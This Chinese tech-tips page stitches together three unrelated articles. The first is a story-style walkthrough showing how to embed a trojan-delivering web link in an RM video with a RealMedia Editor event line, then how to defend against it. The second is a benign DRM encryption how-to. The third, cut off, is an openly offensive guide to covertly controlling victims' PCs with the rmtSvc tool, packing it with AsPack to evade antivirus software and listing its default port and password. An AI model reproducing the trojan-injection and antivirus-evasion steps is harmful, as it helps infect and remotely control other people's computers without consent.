RM文件中木马

  五一期间,到处都人满为患,我还是选择在家度过不长不短的七天长假,其实和我有同样安排的人有很多,比如佳佳MM就是如此。为了缓解前段时间工作的压力,她打算安安静静地呆在家里哪也不去,准备和各种各样的大片一同度过,正所谓“五一七天乐,在家也快乐”。www.sq120.com推荐文章
  五一刚过了两天,第三天一大早醒来,我突然接到了佳佳MM的求助电话。“东渝哥哥,我想给你商量一件事,今天中午我请你吃饭好吗?”这样一句话使得躺在床上的我以为自己在做梦,连掐了自己几下。“难道是鸿门宴!要知道以前我请她吃饭,都不肯赏脸,今天居然请我吃饭,一定是有求于我。”果然不出所料,在吃饭的时候,佳佳MM说自己的系统可能中了木马程序,让他帮忙看看。
  吃人嘴短,没有办法,吃完饭后我来到MM家里。在认真查看了系统的进程后,发现一个可疑的“iexplore.exe”进程。“这不是IE浏览器的进程吗,我没有运行啊,怎么会有这个进程呢?”我的心中泛起了疑惑,“看来你的系统一定是中了某种木马程序,IE浏览器是被它调用的。”
  “我这几天除了下载了三部电影,什么也没有下载啊!”MM说道。于是我对这三部电影进行检查,发现果然不出所料,里面有一些奇怪的链接。看来是中了网页木马,这个简单,找到这个网页,然后对症下药,清除掉系统中的木马。
  “看几部电影就会中木马?”佳佳MM不解地问道。WwW.ItcomPutEr.COM.cN“你不是说只有RealPlayer播放器的用户才会中木马的吗?我用的可是MPC啊,怎么也中木马了呢?”我只好解释:“以前是只有RealPlayer播放器才能中网页木马的,可现在的入侵方法日新月异,简直是防不胜防啊。正好今天有空,给你露一手,看看入侵者如何在RM文件中加入恶意代码的。”说做就做,马上动手给MM演示。
再现RM木马恶作剧
  “由于RM文件是网络上最常用的多媒体文件类型之一,所以通过这种方法进行网页木马的传播,可以让受危害的用户面更加的广。其实这种方法最早是用于传播网络广告的,而现在已经被入侵者利用,并且给普通的RM文件加入网页木马的链接的操作也并不复杂,通过一些现成的工具就可以完成,比如Helix Producer Plus、RealMedia Editor。”我给MM先介绍一下。
  “首先要准备一个RM视频文件作为网页木马传播的原材料,最好有一些吸引人的内容,不然受害者就不会观看到木马触发的那个时间段。另外还有一个好处就是,当用户津津有味地观看电影的时候,是不会在乎弹出的网页的。”我补充了一下。
  我首先打开记事本程序,新建一个文本文件,在上面输入下面一段代码,然后将其保存为mm.txt:
  u 00:00:20.0 00:00:30.0 &&_rpexternal&&http://www.cpcw.com/test.htm
  我来解释一下这段代码的意思。其中u是事件标志(Flag),表示要在文件中插入的是一个URL地址。接着第三个字段表示起止时间点,单位格式是“小时:分:秒.毫秒”,最后一个字段是你要弹出的URL的地址,“ _rpexternal”参数表示在外部浏览器打开URL,而不是使用缺省的Realplayer内嵌的浏览器打开URL。这里表明当播放到第20秒或者将播放进度拖到第20秒至30秒之间的任意时间时,RM文件都会自动调用系统默认的浏览器打开“http://www.cpcw.com/test.htm”的这个网页链接,从而将木马程序安装到用户的系统中。
  接着我运行RM视频文件编辑工具RealMedia Editor,点击“文件”菜单下的“打开Real媒体文件”命令来打开先前准备好的那段正常的RM视频文件,然后点击“工具”菜单下的“合并事件”命令,选择刚才保存的那个文本文件。最后点击“文件”菜单下的“RealMedia文件另存为”命令,将它另存为一个全新的RM文件,这样一个携带了网页木马的RM文件就制作完成了。

为MM支招
  对于这种恶意的RM文件的防范,不同的情况可以采用不同的方法。对于那些可以下载到硬盘中的RM文件,我们可以通过一款名为“Real 媒体过滤器”的软件对可疑的RM文件进行处理,将其中可能包含的一些外加的网页链接和特效去除掉。运行“Real 媒体过滤器”,在“源文件”和“另存为”选项后进行相应的设置,然后点击“开始过滤”按钮就可去除可疑RM文件中的多余链接(如图2)。过滤完成后,程序会弹出一个对话框并提示过滤的内容。
  另外,如果用户使用MPC进行播放的话,可以把Real媒体文件的解码类型设置为DirectShow即可,因为使用DirectShow格式可以自动屏蔽掉这些广告。但因为RM文件是Real公司的独家格式,所以DirectShow格式对于一些特殊的RM文件不能解码。这时就只有使用RealMedia格式进行播放了,但自动屏蔽广告的功能将失效。
  最后提醒广大可爱的MM,及时到微软网站去下载最新的安全补丁,堵住系统以及软件的漏洞;安装最新的反病毒软件并及时更新病毒库;安装网络防火墙,封堵不需要的端口,并对试图连接互联网的进程进行认真的筛选。

 
多媒体之DRM加密   有时我们在播放从网上下载的影视文件时会要求输入用户许可证,否则就不能正常播放,其实这就是利用了多媒体DRM加密技术保护了你的版权(DRM是数字权限管理技术的缩写)。例如,你将自己拍摄的某个视频文件上传到网上,但只想让获得了许可的朋友才能进行观看,这是不是一件很惬意的事呢?
DRM加密原理(本文为WWW.SQ120.COM电脑知识网推荐文章)
  首先需要建立一个数字节目授权中心(相当于许可证发放服务器),例如在服务器上安装和配置中国数字版权管理网(www.china-drm.com)中的“许可证发放管理系统”软件,对用户授权进行设置,能设置播放及刻录的次数,许可证有效日期等等,然后利用工具软件对该文件进行加密,加密的数字节目头部存放着KeyID和节目授权中心的URL,当用户进行播放时,将根据节目头部的KeyID和URL信息就可以通过数字节目授权中心的验证授权后送出相关密钥,这时加密的媒体即可播放。
  小知识:密钥一般有两种,其中公钥(Public Key)用于加密节目本身,私钥(private Key)用于解密节目和防止当节目头部有被改动或破坏的情况。
媒体文件加密过程
  在这里我们可以利用“小宇Windows Media DRM打包加密”软件对媒体文件进行加密。加密的具体步骤如下:
  第1步:首先在软件主界面“认证字符串”标签页中设置SEED、密钥以及认证URL,其中认证URL为许可证发放服务器的网址。
  第2步:在“自定义打包”标签页中,分别在“源文件设置”栏和“文件输出”栏中确定源文件及输出目录的路径。
  提示:如果你所要加密的媒体格式不是WMV,WMA或ASF,那么就需要对媒体文件进行格式转换。
  第3步:在“输出文件后缀”中随意输入一个后缀名,然后点击“打包加密”按钮即可。
  提示:我们利用软件提供的“批量打包”功能可以对大量需要进行DRM加密的媒体文件进行批量加密。
  按照以上步骤设置后,当播放有DRM版权保护的媒体文件时,就会打开许可证发放服务器站点的网页并要求你进行许可认证。
   
rmtSvc&vIDC应用实战 有IE,想黑就黑!
  首先在http://www.sixvee.com/520yy/tools/rmtsvc247.rar下载rmtSvc&vIDC的最新版本2.4.7版(以下简称rmtSvc)。简单点说,rmtSvc是一款集FTP、Telnet服务、Proxy服务以及vIDC服务的远程控制工具。用户可以通过此款工具方便地对远程计算机进行控制。此工具和其它远程控制工具不同,它采用B/S结构(无需安装),用户可通过浏览器进行远程控制(我们的口号是:有IE,想黑就黑!)。
  下面,笔者就以入侵控制的实例来为大家分别介绍rmtSvc常用功能的使用方法及技巧。解压下载后的压缩包,先别急着让rmtSvc.exe在目标机运行(未加壳的程序会遭到杀毒软件的查杀),笔者先告诉大家如何给源程序加壳从而避免被查杀吧(不然就没得玩了-_-|)。在http://www.sixvee.com/520yy/tools/AsPack.rar下载加壳程序AsPack Ver2.12版,运行程序,进入“选项”菜单,勾选“保留额外数据”,然后“打开文件”,选择源程序rmtSvc.exe后就会自动压缩了。
  特别提醒:压缩后的rmtSvc.exe不会被杀毒软件查杀,而且文件体积会减少近50%(经过金山毒霸6增强版、KV2005、诺顿2005测试),如果想进一步增强隐蔽性,请参考2004年第50期G9版《披着羊皮的狼——将Radmin改造为百分百木马》一文介绍的“超级捆绑”软件的使用方法。木马程序的欺骗发送本文就不作进一步讨论了。
武装rmtSvc,“暗杀”杀毒软件
  1.打开浏览器输入http://IP:port(其中IP为被控机的IP地址,port为rmtSvc的服务端口,默认为7778)。连接成功后将会看到如图1的欢迎登录画面,输入访问密码(默认为123456),就可以进行rmtSvc所支持的操作(如果之前已经连同msnlib.dll和webe目录都发给了对方,那么rmtSvc将会多出用MSN进行远程控制和HTTP方式文件管理的功能)。